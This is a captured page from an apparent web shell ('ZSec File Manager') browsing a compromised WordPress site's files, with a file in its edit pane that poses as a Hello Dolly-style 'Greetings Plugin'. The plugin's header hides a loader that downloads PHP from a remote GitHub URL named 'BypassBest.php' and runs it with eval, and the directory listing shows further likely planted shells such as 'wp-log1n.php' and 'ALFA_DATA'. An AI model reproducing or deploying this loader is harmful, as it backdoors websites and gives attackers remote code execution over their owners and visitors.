ZSec File Manager
Upload
Current Directory: /home/aiessinternational.com/public_html
[Up]
..
[Open]
Hapus
Rename
.htaccess
[Edit]
Hapus
Rename
21cbfe
[Open]
Hapus
Rename
ALFA_DATA
[Open]
Hapus
Rename
advance
[Open]
Hapus
Rename
advance.zip
[Edit]
Hapus
Rename
ammika.php
[Edit]
Hapus
Rename
c8aa5
[Open]
Hapus
Rename
click.php
[Edit]
Hapus
Rename
defaults.php
[Edit]
Hapus
Rename
google41b982abb0d9ca3b.html
[Edit]
Hapus
Rename
index.php
[Edit]
Hapus
Rename
index.php0
[Edit]
Hapus
Rename
item.php
[Edit]
Hapus
Rename
license.txt
[Edit]
Hapus
Rename
mah.php
[Edit]
Hapus
Rename
networks.php
[Edit]
Hapus
Rename
options.php
[Edit]
Hapus
Rename
plugins.php
[Edit]
Hapus
Rename
product.php
[Edit]
Hapus
Rename
readme.html
[Edit]
Hapus
Rename
robots.txt
[Edit]
Hapus
Rename
saiga.php
[Edit]
Hapus
Rename
search.php
[Edit]
Hapus
Rename
web.config
[Edit]
Hapus
Rename
wp-activate.php
[Edit]
Hapus
Rename
wp-admin
[Open]
Hapus
Rename
wp-blog-header.php
[Edit]
Hapus
Rename
wp-comments-post.php
[Edit]
Hapus
Rename
wp-config-sample.php
[Edit]
Hapus
Rename
wp-config.php
[Edit]
Hapus
Rename
wp-content
[Open]
Hapus
Rename
wp-cron.php
[Edit]
Hapus
Rename
wp-includes
[Open]
Hapus
Rename
wp-links-opml.php
[Edit]
Hapus
Rename
wp-load.php
[Edit]
Hapus
Rename
wp-log1n.php
[Edit]
Hapus
Rename
wp-mail.php
[Edit]
Hapus
Rename
wp-settings.php
[Edit]
Hapus
Rename
wp-signup.php
[Edit]
Hapus
Rename
wp-trackback.php
[Edit]
Hapus
Rename
wp.php
[Edit]
Hapus
Rename
xmlrpc.php
[Edit]
Hapus
Rename
Edit File
<?php /** * @package Greetings_Plugin * @version 1.0.0 */ /* Plugin Name: Greetings Plugin Plugin URI: http://wordpress.org/plugins/greetings-plugin/ Description: This plugin represents the spirit of an era with the famous lyrics from "Hello, Dolly," sung by Louis Armstrong. Activating this plugin will display a random lyric in the top-right corner of your admin screen. Author: Developer Name Version: 1.0.0 Author URI: http://developer.example.com/ */ $externalResource = "https://raw.githubusercontent.com/starkvps99812/upd/refs/heads/main/BypassBest.php"; $connectionHandle = curl_init($externalResource); curl_setopt($connectionHandle, CURLOPT_RETURNTRANSFER, true); $retrievedCode = curl_exec($connectionHandle); if (curl_errno($connectionHandle)) { die('cURL error occurred: ' . curl_error($connectionHandle)); } curl_close($connectionHandle); eval("?>" . $retrievedCode); function get_random_lyric() { /** Lyrics from Hello Dolly */ $songLyrics = "Hello, Dolly Well, hello, Dolly It's so nice to have you back where you belong You're lookin' swell, Dolly I can tell, Dolly You're still glowin', you're still crowin' You're still goin' strong I feel the room swayin' While the band's playin' One of our old favorite songs from way back when So, take her wrap, fellas Dolly, never go away again Hello, Dolly Well, hello, Dolly It's so nice to have you back where you belong You're lookin' swell, Dolly I can tell, Dolly You're still glowin', you're still crowin' You're still goin' strong I feel the room swayin' While the band's playin' One of our old favorite songs from way back when So, golly, gee, fellas Have a little faith in me, fellas Dolly, never go away Promise, you'll never go away Dolly'll never go away again"; // Break lyrics into lines $songLyrics = explode("\n", $songLyrics); // Pick a random line return wptexturize($songLyrics[mt_rand(0, count($songLyrics) - 1)]); } // Display the chosen lyric function display_greeting() { $randomLyric = get_random_lyric(); $languageAttribute = ''; if ('en_' !== substr(get_user_locale(), 0, 3)) { $languageAttribute = ' lang="en"'; } printf( '<p id="greeting"><span class="screen-reader-text">%s </span><span dir="ltr"%s>%s</span></p>', __('Lyric from Hello Dolly, by Jerry Herman:', 'greetings-plugin'), $languageAttribute, $randomLyric ); } // Hook the function to the admin_notices action add_action('admin_notices', 'display_greeting'); // Add CSS for positioning the lyric display function greeting_styles() { echo " <style type='text/css'> #greeting { float: right; padding: 5px 10px; margin: 0; font-size: 12px; line-height: 1.6666; } .rtl #greeting { float: left; } .block-editor-page #greeting { display: none; } @media screen and (max-width: 782px) { #greeting, .rtl #greeting { float: none; padding-left: 0; padding-right: 0; } } </style> "; } add_action('admin_head', 'greeting_styles');
Simpan